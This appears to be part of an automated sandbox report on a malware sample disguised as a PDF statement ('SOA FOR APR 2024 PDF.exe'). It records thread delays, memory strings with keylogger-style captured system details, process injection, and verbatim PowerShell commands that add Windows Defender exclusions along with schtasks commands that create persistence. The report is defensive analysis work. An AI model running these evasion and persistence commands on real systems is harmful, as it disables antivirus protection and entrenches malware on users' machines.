                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1197107
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1196999
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1196890
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1196773
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1196671
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1196562
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1196453
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1196343
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1196234
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1196124
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1196014
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1195906
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1195793
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1195687
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1195577
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1195468
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1195359
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1195247
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1195140
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 100000
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99875
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99765
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99656
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99547
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99437
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99328
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99216
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99109
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99000
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98890
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98781
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98669
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98562
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98453
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98343
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98234
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98124
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98015
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97906
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97797
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97687
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97578
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97468
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97359
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97250
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199922
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199813
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199688
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199563
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199438
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199329
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199204
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199079
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198954
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198829
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198713
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198597
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198467
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198360
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198249
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198141
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198016
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197891
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197782
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197657
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197532
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197422
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197312
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197203
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 100000
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99891
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99781
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99672
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99563
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99438
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99325
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99219
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99094
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98985
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98860
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98735
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98610
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98485
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98360
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98235
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98110
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97985
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97860
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97735
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97610
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97484
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97372
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97265
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97156
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 96892
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 96766
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 96625
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199988
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199833
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199703
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199594
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199484
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199375
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199265
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199156
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199047
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198938
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198813
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198688
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198578
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198469
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198344
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198234
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198125
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198015
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197906
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197797
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197687
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197578
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197469
                    Source: SOA FOR APR 2024 PDF.exe, 00000000.00000002.2077429263.0000000009CB0000.00000004.08000000.00040000.00000000.sdmp, SOA FOR APR 2024 PDF.exe, 00000000.00000002.2071533656.0000000004557000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CjieVEhOcdajCk6j0raZbjhWuHb1LQPLywa9D4B6EPMt7Nun3yQaI5fTCZTvdpopkx5bgW8ETp9pHcTtX8QVm9TwdeVACB3DHPDTYTwje076ThpHiExuyr2n0yOge1UserControlSystem.Windows.FormsGnlH9cqJCh0ZXnp8mGUITypeEditorSystem.Drawing.DesignSystem.DrawinggTdATB67FNtORV17YvEnumf5TiJdN9Bou9Q3xtWunGmLwVBnVfTdlp5BLMURqoV1LhkZEcr5B7SEbiZh2gK40cl2yGnYqtMulticastDelegatecHLRchCmNvpnMUhuxtVAyS34ITGf7b2iLRjKR3A9U35KfOwwEmxovilYaLnGD1uR3vfgP7UxlUIc0VfC3HYObaDCCnni52VbPhdJDEiWirelMq7PbOpPVvyugSSPCDHgq6cTe88XF7y76a9vN8IuM3Y5uaAx3aWB7hGo1htc7qqIjxwsJf3ltCqaDPXOlSyMTs5xHGhDg4MjZZrfMFYlfNAPj5B6WlmCLLyG1dqwGlxW3M9nnjOETYtamVKpOYJq733dMTP5XwhODvPFlaf8218f21jXMt2tA3hPqIbkW1Yq736dEdzR962jgwJTBy3llXmIQjWXqcJf5GwJ80QgHJwofKNbEAj1NqeoHrSVOcGry4VRIcmlRjnwWlvwucTM9lKq0PYnrVYHNtXG1aUhRX4l54uI8IjuuVQB19vvI7AaggOJf5kGITltdpbQkdlLUWK98aPhSjMAkSLdoffYwv2cBCQX4G7aqGWhqqODlmX5ae6Zl0JrtdgPULBcsU4NCG9dpGSTZZXdQUJK0UCO08Hh8mUbW4bIRmRSOEmD3T4wo0nSGl4eGucR0b01PKM2hmDRPqolS2BO314YeOCJo2JEiYWZGC26Mg27EventArgsvrXuU3w65ot0jPRPDPApplicationExceptionhBijZRtWbDg84TdWNqwXATugk9wSyYEyEcyLw6iaBXy0lNlijfRFCyPn5BBaFIx4XqemuESDAdTDBmj5wP70ngiXNIpM80BPcxvs4LY9xqQ0tBds93ssCpjlCvnUZqyc7qrk8Tc5bj7LoIC3oBEhsVWmimMw51DsPZe5FEW7AFJ6dV89uR7FRandomqt7PC3rIs2mV3uwCpYlSKOsXzsDqgETFxwXpExpandableObjectConverterSystem.ComponentModelrlr5Oauv8vspKmK80PTpakpIkuu8VRoyYfqsJCPRdGvIuhJmrOrqw5g6NgVZTkpuMgvv3J2liIu2<Module>{A9EFE4B9-2954-446D-8527-6AAE8CAD2F89}YmVarSudDOTaCV92sYLzBM0pUuTP74sfUUnO6kgO1EhpuqrZKJQlwf2KW<PrivateImplementationDetails>{2870AF46-B22A-45E9-B1AA-D47AF76E00FE}__StaticArrayInitTypeSize=256__StaticArrayInitTypeSize=40__StaticArrayInitTypeSize=30__StaticArrayInitTypeSize=32__StaticArrayInitTypeSize=16__StaticArrayInitTypeSize=64__StaticArrayInitTypeSize=18
                    Source: SOA FOR APR 2024 PDF.exe, 00000009.00000002.3275075106.0000000000BF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
                    Source: SOA FOR APR 2024 PDF.exe, 00000000.00000002.2077429263.0000000009CB0000.00000004.08000000.00040000.00000000.sdmp, SOA FOR APR 2024 PDF.exe, 00000000.00000002.2071533656.0000000004557000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Pn5BBaFIx4XqemuESD
                    Source: eeBIYZL.exe, 0000000E.00000002.3275604629.0000000000FB7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: BjTxJte.exe, 00000014.00000002.3276901832.0000000001710000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000018.00000002.3322622943.00000000066A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe"
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eeBIYZL.exe"
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eeBIYZL.exe"Jump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeMemory written: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeMemory written: C:\Users\user\AppData\Roaming\eeBIYZL.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory written: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory written: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eeBIYZL.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmpCB26.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess created: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe "C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmpE2E4.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess created: C:\Users\user\AppData\Roaming\eeBIYZL.exe "C:\Users\user\AppData\Roaming\eeBIYZL.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmp9B5.tmp"
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmp2ADA.tmp"
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                    Source: SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.000000000289F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $jq3<b>[ Program Manager]</b> (27/04/2024 01:25:51)<br>
                    Source: SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.000000000289F000.00000004.00000800.00020000.00000000.sdmp, eeBIYZL.exe, 0000000E.00000002.3282284281.0000000002EC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.00000000028B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Time: 05/25/2024 17:47:32<br>User Name: user<br>Computer Name: 035347<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br>IP Address: 102.129.152.220<br><hr><b>[ Program Manager]</b> (27/04/2024 01:25:51)<br>{Win}rTejqTL
                    Source: eeBIYZL.exe, 0000000E.00000002.3282284281.0000000002EC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $jq3<b>[ Program Manager]</b> (26/04/2024 11:43:08)<br>
                    Source: SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.000000000289F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $jq9<b>[ Program Manager]</b> (27/04/2024 01:25:51)<br>{Win}rTHoq8
                    Source: SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.0000000002909000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 2.129.152.220<br><hr><b>[ Program Manager]</b> (27/04/2024 01:25:=
                    Source: SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.000000000289F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRjq`
                    Source: SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.00000000028B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Time: 05/25/2024 17:47:32<br>User Name: user<br>Computer Name: 035347<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br>IP Address: 102.129.152.220<br><hr><b>[ Program Manager]</b> (27/04/2024 01:25:51)<br>{Win}r
                    Source: SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.000000000289F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $jq8<b>[ Program Manager]</b> (27/04/2024 01:25:51)<br>{Win}THoq8
                    Source: eeBIYZL.exe, 0000000E.00000002.3282284281.0000000002EC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $jq8<b>[ Program Manager]</b> (26/04/2024 11:43:08)<br>{Win}THoq
                    Source: SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.00000000028B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: @\jqDTime: 05/25/2024 17:47:32<br>User Name: user<br>Computer Name: 035347<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br>IP Address: 102.129.152.220<br><hr><b>[ Program Manager]</b> (27/04/2024 01:25:51)<br>{Win}r
                    Source: eeBIYZL.exe, 0000000E.00000002.3282284281.0000000002EC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRjq
                    Source: eeBIYZL.exe, 0000000E.00000002.3282284281.0000000002EC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $jq9<b>[ Program Manager]</b> (26/04/2024 11:43:08)<br>{Win}rTHoq
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeQueries volume information: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
